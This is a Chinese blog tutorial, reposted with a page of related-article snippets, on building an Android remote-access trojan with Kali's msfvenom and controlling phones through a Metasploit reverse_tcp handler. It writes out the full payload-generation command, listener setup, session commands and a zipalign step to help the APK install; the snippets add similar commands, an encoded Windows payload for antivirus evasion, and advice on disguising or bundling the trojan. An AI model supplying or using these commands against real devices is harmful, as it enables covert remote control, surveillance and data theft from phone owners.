Kali环境使用Metasploit生成木马入侵安卓手机

最新推荐文章于 2024-03-31 11:27:46 发布
最新推荐文章于 2024-03-31 11:27:46 发布
阅读量1.6k 收藏 7
点赞数 4
文章标签: 移动开发
原文链接:http://www.cnblogs.com/hackhyl/p/9532427.html
版权

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

环境准备:

Kali2.0(msfVENOM、metasploit)
安卓手机或安卓模拟器

利用过程:

先查看本地IP地址

使用msfvenom生成apk木马

 
1
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk

注释:

LHOST = 接收反弹连接主机

LPORT = 接收反弹连接主机的监听端口

172.16.105.184修改为本地的IP地址 5555是生成的端口号/root/apk.apk是生成的APK路径

如显示下图所示说明生成成功!

启动msfconsole

输入命令:

 
1
msfconsole

然后执行以下命令

 
1
2
3
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
show options //查看参数设置

这个payload里边有两个参数要设置

LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

 
1
2
3
set LHOST 172.16.105.184 //这里的地址设置成我们刚才生成木马的IP地址
 
set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

配置完成后我们可以执行

 
1
show options //查看是否配置成功

最后我们把生成后的APK文件安装到模拟器或者手机中然后执行

 
1
exploit //开始执行漏洞 开始监听,等待手机上线

我们可以发现有一个ID与本机处于连接状态,现在我们可以执行

 
1
2
sessions //查看连接状态
sessions 1 //建立与ID值位1的主机连接

现在我们可以执行

 
1
sysinfo

更多命令参数可以使用help命令查看

PS:如果在操作过程中有什么不懂的或遇到什么问题可以在文章下方留言小残看到后悔第一时间为大家解答

如果遇到部分手机会无法安装生成后发APK文件那么我们可以zipalign工具优化处理

 
 
1
zipalign -v 4 apk.apk  napk1.apk

 

 
标签: 漏洞

转载于:https://www.cnblogs.com/hackhyl/p/9532427.html

SimminonGarcia
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux使用Metasploit生成木马入侵系统
简介
02-24 8040
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
kali手机木马远控
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
kali linux怎么入侵手机,Kali Linux-Metasploit入侵Android手机
weixin_31970409的博客
05-13 6926
kali Linux-Metasploit入侵Android手机写此文章的初衷是为了告诉哪些喜欢蹭别人wifi的人,这样的做法是很危险的哦!Kali Linux IP地址192.168.1.101(虚拟机设置桥接模式)同一局域网内手机一部创建一个后门程序 创建的此后门程序我们设置是通过80端口接受默认的kali装好之后是没有任何端口打开的 这里我们需要开启80端口为了方便 我们直接装apa...
在任意手机Metasploit Framework(无ROOT)
最新发布
xyzzklk的博客
03-31 155
在任意未ROOT手机装完整Metasploit
Kali Linux 如何破解 Android 手机
Android 开发架构
06-16 2414
出现meterpreter提示:
2021Kali -- 木马免杀制作
weixin_41489908的博客
04-24 3906
​知道为什么梦里的人都看不清脸么?因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF,演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c -p:指定payload -e:指定选择使用的编码 ...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
kali-linux 工具Metasploit离线式攻击使用教程
12-29
攻击实例讲解4-Metasploit离线式攻击.rar
kali for android让你的设备跑起kali.docx
08-20
"Kali for Android 让你的设备跑起 Kali" Kali for Android 是一种将 Kali 系统装到设备上的解决方案,将设备变成渗透测试小钢炮。以下是实现 Kali for Android 的详细步骤和知识点: 一、前提条件 ...
使用kali-linux将Metasploit Framework接入互联网的使用教程
12-29
使用kali-linux将Metasploit Framework接入互联网的使用教程
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
手机Kali Linux系统
05-12
自己整理的一份在手机上跑Kali Linux系统,希望对各位有帮助
使用Kali linux生成木马入侵局域网手机
热门推荐
WuHao的博客
04-02 1万+
1、首先查看本机ip,这里我本机IP地址为192.168.0.105 2、生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 输入上述命令生成木马,这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小 3、启动ms...
MSF手机渗透实验
weixin_63204687的博客
10-22 4201
可真刑,太可拷了
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机
Ho1aAs‘s Blog
07-29 6054
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完 免责声明:本文章仅供网络全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole msfvenom Windows Se
利用MSF攻击Android
qq_45746768的博客
07-08 3721
利用Metasploit攻击Android
Kali Linux利用MSF入侵手机
weixin_42916109的博客
06-06 5853
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
简单的Msf木马免杀
weixin_47948655的博客
08-12 987
简单加密shellcode与加载器实现msf木马免杀
kali-捆绑应用程序
乌托托的博客
12-19 522
kali捆绑应用程序
kali metasploit 木马
08-30
如果你想了解如何在Kali Linux中使用Metasploit来创建和使用木马,我建议你参考一些相关的教程和指南。这些资源可以帮助你学习如何使用Metasploit来进行渗透测试,但请记住,合法和道德的用途是非常重要的。在未经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值